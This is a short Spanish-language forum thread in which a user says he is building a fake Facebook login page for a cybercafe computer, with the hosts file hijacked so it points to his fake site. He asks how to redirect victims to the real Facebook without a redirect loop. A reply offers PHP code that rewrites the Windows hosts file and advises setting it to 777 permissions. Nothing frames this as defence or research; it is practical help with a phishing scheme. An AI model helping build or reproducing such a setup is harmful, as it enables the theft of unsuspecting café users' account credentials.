Duda redireccion

Iniciado por DarkXploitz, Enero 28, 2016, 08:25:43 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Enero 28, 2016, 08:25:43 AM Ultima modificación: Enero 28, 2016, 08:11:15 PM por Expermicid
hola me estoy creando un fake de facebook para ponerlo en un cyber, en una pc voy a redireccionar el archivo host de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a mi facebook.fake hasta hay todo bien, ahora mi duda es que en mi codigo php yo redireciono a la pagina facebook original pero al haber modificado el host siempre me va a redireccionar a la pagina fake una y otra ves en un bucle infinito, hay alguna manera de que la fake redirecione a la original sin que me afecte el cambio que hice al host  :-\
No Te Pido Que Pienses Como Yo, Solo Te Pido Que Pienses

Enero 28, 2016, 09:33:41 AM #1 Ultima modificación: Enero 28, 2016, 08:12:30 PM por Expermicid
Mmm se me ocurre que quizás puedas modificar de nuevo el /etc/host desde php antes de reedirigir a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, aunque la verdad, es que nunca lo hice:

Código: php
<?php
$file = fopen("C:\Windows\System32\drivers\etc\hosts", "a");
fwrite($file, "www.facebook.com                  www.facebook.fake" . PHP_EOL);
fclose($file);
?>


Añádele permisos 777 al fichero.

De lo contrario, puedes intentar jugar los subdominios de facebook.

Si se me ocurre algo más, te lo comento.

Saludos.



Enero 28, 2016, 10:06:13 AM #2 Ultima modificación: Enero 28, 2016, 08:13:24 PM por Expermicid
ok gracias voy a probar y comento resultados
No Te Pido Que Pienses Como Yo, Solo Te Pido Que Pienses